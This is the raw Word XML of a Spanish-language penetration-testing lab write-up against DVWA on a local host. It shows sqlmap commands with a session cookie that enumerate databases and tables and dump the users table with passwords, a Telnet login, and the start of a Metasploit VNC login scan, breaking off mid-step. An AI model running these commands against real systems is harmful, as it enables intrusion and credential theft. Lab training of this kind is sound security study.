          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD7A8A5" w14:textId="2B7946D7" w:rsidR="00A97387" w:rsidRDefault="00A97387" w:rsidP="00A97387">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Configuración del Foxy Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A757E" w14:textId="669F654E" w:rsidR="00A97387" w:rsidRDefault="00A97387" w:rsidP="00A97387">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59B5C31D" wp14:editId="00B7FC40">
            <wp:extent cx="5612130" cy="38804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80485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFE5691" w14:textId="6EC2DB08" w:rsidR="00A97387" w:rsidRDefault="000C4C5B" w:rsidP="00A97387">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Configuración</w:t>
      </w:r>
      <w:r w:rsidR="00A97387">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el BurpSuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78247EE3" w14:textId="75C9AD8D" w:rsidR="00A97387" w:rsidRDefault="00A97387" w:rsidP="00A97387">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6186FDF6" wp14:editId="3D647463">
            <wp:extent cx="5612130" cy="22885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88540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513E418" w14:textId="77225FE1" w:rsidR="000C4C5B" w:rsidRDefault="000C4C5B" w:rsidP="000C4C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC541E8" w14:textId="6615C385" w:rsidR="000C4C5B" w:rsidRDefault="000C4C5B" w:rsidP="000C4C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Nos dirigimos al apartado de SQL Injection en DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFABC3A" w14:textId="7543607E" w:rsidR="000C4C5B" w:rsidRDefault="000C4C5B" w:rsidP="000C4C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42D258A3" wp14:editId="6337F874">
            <wp:extent cx="5612130" cy="27247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4785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D9B743" w14:textId="4BC014AE" w:rsidR="000C4C5B" w:rsidRDefault="000C4C5B" w:rsidP="000C4C5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Escribimos algo en la caja de texto y damos submit y con burpsuite capturaremos el trafico </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E63F37" w14:textId="53EB7F96" w:rsidR="000C4C5B" w:rsidRDefault="000C4C5B" w:rsidP="000C4C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BDAD05F" wp14:editId="618C06BE">
            <wp:extent cx="5612130" cy="3011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11170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E475F" w14:textId="62748947" w:rsidR="000C4C5B" w:rsidRPr="000C4C5B" w:rsidRDefault="000C4C5B" w:rsidP="000C4C5B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4C5B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Con esta información usaremos sqlmap para obtener los nombres de las bases de </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0714E447" w14:textId="02A01E8F" w:rsidR="000C4C5B" w:rsidRPr="000C4C5B" w:rsidRDefault="000C4C5B" w:rsidP="000C4C5B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4C5B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u </w:t>
      </w:r>
      <w:r w:rsidR="00DC6258" w:rsidRPr="00DC6258">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>sqlmap -u "http://192.168.2.102/dvwa/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="security=low;PHPSESSID=765d41a95c20d3c0cfbba7dfdc13b0a5"  --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8A9229" w14:textId="684D24C7" w:rsidR="000C4C5B" w:rsidRDefault="0057775B" w:rsidP="000C4C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75CAAB2F" wp14:editId="203B352C">
            <wp:extent cx="5612130" cy="43942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39420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7288DDF3" w14:textId="7877DBB9" w:rsidR="00D061F2" w:rsidRDefault="00D061F2" w:rsidP="000C4C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D061F2">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Y obtenemos las bases de d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>atos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293550A7" w14:textId="726F2A97" w:rsidR="00D061F2" w:rsidRDefault="00DC6258" w:rsidP="000C4C5B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61A920E1" wp14:editId="4640F5EB">
            <wp:extent cx="5612130" cy="14668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66850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="675CE12F" w14:textId="7691880A" w:rsidR="00DC6258" w:rsidRPr="00DC6258" w:rsidRDefault="00DC6258" w:rsidP="00DC6258">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC6258">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Ahora procederemos a usar este código para obtener los nombres de las tablas de la Base de datos dvwa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137AF06" w14:textId="4DCD81B7" w:rsidR="00DC6258" w:rsidRPr="00DC6258" w:rsidRDefault="00DC6258" w:rsidP="00DC6258">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk94456605"/>
      <w:r w:rsidRPr="00DC6258">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC6258">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>"http://192.168.2.102/dvwa/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="security=low;PHPSESSID=765d41a95c20d3c0cfbba7dfdc13b0a5"</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4C5B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC6258">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-D dvwa --tables</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="2DC1C6BC" w14:textId="7156ACA6" w:rsidR="00DC6258" w:rsidRDefault="00A45F76" w:rsidP="00DC6258">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575DE916" wp14:editId="763BBA62">
            <wp:extent cx="5612130" cy="3917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1795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A47D4" w14:textId="73208BA5" w:rsidR="00A45F76" w:rsidRDefault="00A45F76" w:rsidP="00A45F76">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07973919" wp14:editId="1B047C3F">
            <wp:extent cx="5025081" cy="1534020"/>
            <wp:effectExtent l="0" t="0" r="444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4430" cy="1536874"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A3B51" w14:textId="57A90E2B" w:rsidR="00A45F76" w:rsidRDefault="00A45F76" w:rsidP="00A45F76">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45F76">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Y por </w:t>
      </w:r>
      <w:r w:rsidR="00DC02D3" w:rsidRPr="00A45F76">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>último</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45F76">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> para obtener l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>os usuarios contenidos en la tabla users usamos el código:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB9919" w14:textId="7F6314B0" w:rsidR="00A45F76" w:rsidRDefault="00A45F76" w:rsidP="00A45F76">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45F76">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC6258">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>"http://192.168.2.102/dvwa/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="security=low;PHPSESSID=765d41a95c20d3c0cfbba7dfdc13b0a5"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45F76">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dump --batch -T users -D dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DAC76" w14:textId="161F372F" w:rsidR="00A45F76" w:rsidRDefault="00A45F76" w:rsidP="00A45F76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AA04E9E" wp14:editId="6AFA6F74">
            <wp:extent cx="5099221" cy="63235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764" cy="634033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4694C5B0" w14:textId="5C7AF608" w:rsidR="00A45F76" w:rsidRDefault="00AA754B" w:rsidP="00A45F76">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77EBC8DF" wp14:editId="370F1CAE">
            <wp:extent cx="5612130" cy="1922145"/>
            <wp:effectExtent l="0" t="0" r="762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22145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D88F0" w14:textId="50CD286D" w:rsidR="00AA754B" w:rsidRDefault="00AA754B" w:rsidP="00343B24">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA754B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Y aquí obtenemos los usuarios d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>e la base de datos DVWA con sus respectivas contraseñas para poder ingresar a la aplicación web y confirmamos con esta prueba la vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994C2C0" w14:textId="0B0021D6" w:rsidR="00DD5B4A" w:rsidRDefault="00DD5B4A" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B264C87" w14:textId="3C45440B" w:rsidR="00DD5B4A" w:rsidRPr="001C5868" w:rsidRDefault="00DD5B4A" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5868">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de Penetración explotando la vulnerabilidad </w:t>
      </w:r>
      <w:r w:rsidRPr="001C5868">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5B4A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Unencrypted Telnet Server</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5868">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1EB94E" w14:textId="7A11C37B" w:rsidR="00DD5B4A" w:rsidRDefault="00DD5B4A" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Simplemente en la terminal colocamos el comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>telnet 192.168.2.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16853F25" w14:textId="4D943B0E" w:rsidR="00DD5B4A" w:rsidRDefault="00DD5B4A" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A39EFDE" wp14:editId="7ACE27E6">
            <wp:extent cx="5612130" cy="36258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625850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA62E6" w14:textId="05A0F118" w:rsidR="002C42CF" w:rsidRDefault="002C42CF" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4DC98A" w14:textId="6B567578" w:rsidR="002C42CF" w:rsidRDefault="002C42CF" w:rsidP="00DD5B4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explotación del Puerto 5900 VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE5735A" w14:textId="021F8562" w:rsidR="002C42CF" w:rsidRDefault="002C42CF" w:rsidP="002C42CF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Usaremos msfconsole y buscarems el exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="002C42CF">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>auxiliary/scanner/vnc/vnc_login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
